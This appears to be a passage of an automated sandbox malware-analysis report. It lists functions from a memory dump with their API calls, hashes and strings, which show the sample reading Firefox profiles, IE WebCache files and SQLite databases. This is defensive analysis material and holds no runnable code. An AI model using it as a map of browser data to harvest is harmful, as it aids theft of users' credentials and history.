                                                                                                                                                                                                          • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403FBE Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403FE1
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403FF6
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040400B
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404020
                                                                                                                                                                                                          • memset.MSVCRT ref: 00404035
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                                                                                                                                            • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                                                                                                                                            • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                                            • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                                          • memset.MSVCRT ref: 004040FC
                                                                                                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcscpy$wcslen$Close_snwprintfmemcpywcscat
                                                                                                                                                                                                          • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                                                                                                                                          • API String ID: 3527940856-3369679110
                                                                                                                                                                                                          • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                          • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00444432 Relevance: 10.7, APIs: 1, Strings: 6, Instructions: 217COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                          • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                                                                                                                                          • API String ID: 3510742995-2641926074
                                                                                                                                                                                                          • Opcode ID: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                                                                          • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                                                                                                                                          • Opcode Fuzzy Hash: ce3f0164aafa0249c1655987c9fd68d1cb4a7ac41c6f811fdb80cf943b1bed77
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004032B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 119COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                                                                                                                                                                                            • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                            • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                          • memset.MSVCRT ref: 004033B7
                                                                                                                                                                                                          • memcpy.MSVCRT ref: 004033D0
                                                                                                                                                                                                          • wcscmp.MSVCRT ref: 004033FC
                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 00403439
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$??3@_wcsicmpmemcpywcscmpwcsrchr
                                                                                                                                                                                                          • String ID: $0.@
                                                                                                                                                                                                          • API String ID: 3030842498-1896041820
                                                                                                                                                                                                          • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                          • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                                                                                                                                                                          • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004449B9 Relevance: 10.6, APIs: 7, Instructions: 61libraryloaderCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2941347001-0
                                                                                                                                                                                                          • Opcode ID: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                          • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 71f7015b8efbcabf0d8a3174310d871b9f234e636c99dab6741889365bf8ff35
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00403BED Relevance: 9.1, APIs: 4, Strings: 2, Instructions: 57COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C09
                                                                                                                                                                                                          • memset.MSVCRT ref: 00403C1E
                                                                                                                                                                                                            • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                                                                                                                                                            • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C47
                                                                                                                                                                                                            • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                            • Part of subcall function 00414C2E: RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                            • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 00403C70
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcscat$Closewcscpywcslen
                                                                                                                                                                                                          • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                                                                                                                                                                          • API String ID: 3249829328-1174173950
                                                                                                                                                                                                          • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                          • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040A804 Relevance: 9.0, APIs: 6, Instructions: 40libraryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 669240632-0
                                                                                                                                                                                                          • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                          • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                                                                                                                          • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041443E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • wcschr.MSVCRT ref: 00414458
                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0041447D
                                                                                                                                                                                                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                                                                                                                          • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                                                                                                                          • String ID: "%s"
                                                                                                                                                                                                          • API String ID: 1343145685-3297466227
                                                                                                                                                                                                          • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                          • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00413CA4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloadertimeCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                                                                                                                          • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressHandleModuleProcProcessTimes
                                                                                                                                                                                                          • String ID: GetProcessTimes$kernel32.dll
                                                                                                                                                                                                          • API String ID: 1714573020-3385500049
                                                                                                                                                                                                          • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                          • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004087B3 Relevance: 7.7, APIs: 6, Instructions: 190COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 004087D6
                                                                                                                                                                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                            • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408828
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408840
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408858
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408870
                                                                                                                                                                                                          • memset.MSVCRT ref: 00408888
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 2911713577-0
                                                                                                                                                                                                          • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                          • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memcmp
                                                                                                                                                                                                          • String ID: @ $SQLite format 3
                                                                                                                                                                                                          • API String ID: 1475443563-3708268960
                                                                                                                                                                                                          • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                                          • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 00414C2E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77registryCOMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                            • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                                                                                                                          • memset.MSVCRT ref: 00414C87
                                                                                                                                                                                                          • RegCloseKey.ADVAPI32(00445DDE,?,?,?,?,?,00000000), ref: 00414CEE
                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 00414CFC
                                                                                                                                                                                                            • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: AddressCloseProcVersionmemsetwcscpy
                                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                                          • API String ID: 2705122986-2036018995
                                                                                                                                                                                                          • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                          • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: _wcsicmpqsort
                                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                                          • API String ID: 1579243037-1578091866
                                                                                                                                                                                                          • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                          • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0040E5ED Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 61COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                            • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                            • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                                                                                                                          • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                                                                                                                          • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                                                                                                                          • API String ID: 3354267031-2114579845
                                                                                                                                                                                                          • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                          • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                                          • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                          • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Function 0044DEF7 Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000004.00000002.12128866195.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_4_2_400000_wab.jbxd
